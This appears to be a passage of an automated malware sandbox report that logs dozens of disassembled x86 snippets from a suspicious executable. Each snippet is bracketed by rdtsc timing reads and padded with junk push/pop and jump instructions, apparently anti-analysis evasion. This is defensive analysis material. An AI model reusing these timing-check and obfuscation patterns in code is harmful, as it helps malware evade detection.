                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2AE1 second address: EA2AF4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F10525BF6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2AF4 second address: EA2AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2AF8 second address: EA2AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2C62 second address: EA2C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9F112ED7A3h 0x0000000b jmp 00007F9F112ED7A2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2C8F second address: EA2CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9F10525C04h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAF689 second address: EAF693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F9F112ED796h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAF693 second address: EAF699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAF814 second address: EAF81E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9F112ED796h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAF81E second address: EAF824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAF824 second address: EAF83C instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F112ED7A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFB1E second address: EAFB45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C09h 0x00000007 jng 00007F9F10525BF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFB45 second address: EAFB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9F112ED796h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFB4F second address: EAFB6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C09h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFB6C second address: EAFB9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F9F112ED79Ch 0x00000014 popad 0x00000015 jg 00007F9F112ED798h 0x0000001b jl 00007F9F112ED798h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFD12 second address: EAFD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFD16 second address: EAFD1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFD1A second address: EAFD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB0113 second address: EB0118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB026B second address: EB0289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F9F10525C09h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7DBA second address: EB7DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7DBE second address: EB7DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7DC4 second address: EB7DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7DCD second address: EB7DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9F10525BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9F10525C02h 0x00000011 popad 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7DFC second address: EB7E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7E02 second address: EB7E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7E06 second address: EB7E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EC963D second address: EC9683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F9F10525C07h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F9F10525C04h 0x00000017 je 00007F9F10525BF6h 0x0000001d jne 00007F9F10525BF6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EC97FB second address: EC9811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F9F112ED79Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: ED1DB7 second address: ED1DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: ED877D second address: ED8785 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: ED8785 second address: ED87A5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9F10525C08h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EDE9E0 second address: EDE9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F9F112ED7A2h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EDE9FE second address: EDEA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9F10525BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EE3112 second address: EE3129 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9F112ED798h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jo 00007F9F112ED796h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EE3129 second address: EE3144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007F9F10525C02h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EF0A02 second address: EF0A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EF0A06 second address: EF0A10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EF0A10 second address: EF0A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: DFE71C second address: DFE721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EF2F7D second address: EF2F81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EF2F81 second address: EF2F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EF2F89 second address: EF2FB2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F9F112ED7A8h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a jnp 00007F9F112ED796h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E01C3D second address: E01C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9F10525BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F9F10525BFFh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F02713 second address: F02717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F16502 second address: F16540 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9F10525BFAh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F9F10525BFAh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9F10525C08h 0x00000020 jne 00007F9F10525BF6h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F16540 second address: F16556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F9F112ED796h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F9F112ED796h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F16556 second address: F1655A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F1655A second address: F16560 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F166B5 second address: F166BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F166BB second address: F166E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F9F112ED7B5h 0x0000000b jmp 00007F9F112ED79Dh 0x00000010 jmp 00007F9F112ED7A2h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F166E5 second address: F166FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFFh 0x00000007 jp 00007F9F10525BFCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F168A9 second address: F168AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F16CF1 second address: F16D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F9F10525C03h 0x0000000b jmp 00007F9F10525C04h 0x00000010 pop edi 0x00000011 jmp 00007F9F10525BFEh 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F16E99 second address: F16EC5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9F112ED798h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9F112ED7A1h 0x00000011 jmp 00007F9F112ED79Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F17178 second address: F17182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F17182 second address: F1718C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F112ED796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F1A23D second address: F1A241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F1A4B5 second address: F1A518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9F112ED7A2h 0x0000000c jmp 00007F9F112ED79Dh 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F9F112ED798h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e push dword ptr [ebp+122D1865h] 0x00000034 adc dx, 23AFh 0x00000039 push 42E5EE22h 0x0000003e push eax 0x0000003f push edx 0x00000040 jng 00007F9F112ED79Ch 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F1D3B9 second address: F1D3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F1D3C2 second address: F1D3D6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F112ED79Bh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 557036E second address: 5570374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5570374 second address: 5570378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5570378 second address: 557037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 557037C second address: 55703EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9F112ED79Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 movzx esi, di 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 mov ebx, 55BD980Ah 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 jmp 00007F9F112ED7A7h 0x00000025 mov ah, FFh 0x00000027 popad 0x00000028 mov edx, dword ptr [ebp+0Ch] 0x0000002b pushad 0x0000002c mov ax, 6FD3h 0x00000030 popad 0x00000031 mov ecx, dword ptr [ebp+08h] 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov dx, AEE6h 0x0000003b call 00007F9F112ED7A7h 0x00000040 pop eax 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55703EB second address: 55703F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55703F1 second address: 55703F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55907E3 second address: 55907E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55907E9 second address: 55907ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55907ED second address: 559082C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F9F10525BFFh 0x00000010 mov ebp, esp 0x00000012 jmp 00007F9F10525C06h 0x00000017 xchg eax, ecx 0x00000018 pushad 0x00000019 mov ecx, 229E67ADh 0x0000001e push eax 0x0000001f push edx 0x00000020 mov cx, BECFh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 559082C second address: 559083D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2B9D78EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 559083D second address: 5590841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590841 second address: 5590847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590847 second address: 5590870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9F10525BFDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590870 second address: 55908E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F9F112ED79Eh 0x0000000f push eax 0x00000010 jmp 00007F9F112ED79Bh 0x00000015 xchg eax, esi 0x00000016 jmp 00007F9F112ED7A6h 0x0000001b lea eax, dword ptr [ebp-04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F9F112ED79Dh 0x00000027 sub esi, 232B3F86h 0x0000002d jmp 00007F9F112ED7A1h 0x00000032 popfd 0x00000033 mov eax, 61309937h 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55908E9 second address: 5590910 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F9F10525BFEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590910 second address: 5590914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590914 second address: 5590930 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590930 second address: 5590936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590936 second address: 559093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 559093A second address: 559094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx esi, di 0x0000000f movsx edx, ax 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 559094D second address: 5590953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590992 second address: 55909C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d jmp 00007F9F112ED79Eh 0x00000012 mov esi, eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55909C1 second address: 55909C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55909C5 second address: 55909C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55909C9 second address: 55909CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590A76 second address: 558008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov bh, 99h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b jmp 00007F9F112ED7A0h 0x00000010 leave 0x00000011 jmp 00007F9F112ED7A0h 0x00000016 retn 0004h 0x00000019 nop 0x0000001a sub esp, 04h 0x0000001d xor ebx, ebx 0x0000001f cmp eax, 00000000h 0x00000022 je 00007F9F112ED8FAh 0x00000028 mov dword ptr [esp], 0000000Dh 0x0000002f call 00007F9F15C09931h 0x00000034 mov edi, edi 0x00000036 pushad 0x00000037 mov eax, 1E464CBDh 0x0000003c pushfd 0x0000003d jmp 00007F9F112ED79Ah 0x00000042 adc ax, 3498h 0x00000047 jmp 00007F9F112ED79Bh 0x0000004c popfd 0x0000004d popad 0x0000004e xchg eax, ebp 0x0000004f jmp 00007F9F112ED7A6h 0x00000054 push eax 0x00000055 jmp 00007F9F112ED79Bh 